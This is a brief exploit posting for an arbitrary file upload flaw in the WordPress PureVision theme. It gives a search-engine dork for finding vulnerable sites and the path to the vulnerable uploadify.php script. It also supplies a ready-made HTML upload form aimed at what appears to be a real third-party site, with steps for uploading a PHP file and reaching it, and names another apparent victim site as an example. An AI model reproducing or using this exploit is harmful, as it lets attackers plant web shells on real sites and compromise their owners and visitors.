WORDPRESS PURVISION EXPLOIT

#Title : Wordpress PureVision Theme Arbitrary File Upload

#Author : mdhaxor

#Vendor : http://themeforest.net

#Download : http://themeforest.net/item/purevision-wordpress-
theme/156538

#Tested : Mozila, Chrome-> Windows

#Vulnerabillity : Arbitrary File Upload

Dork : inurl:wp-content/themes/ purevision

Vuln: /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php

if vuln it'll show a blank page

CSRF

<form method="POST" action="http://www.cremifacile.com.br/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data"><input type="file"name="Filedata"/><input type="submit" name="submit"value="upload cuy"/><br /> </form>

then upload your file..

Get File Access on www.site.com/yourfilename.php

E.G www.benbusinesstransfers.com/xxd.txt

#thats_all...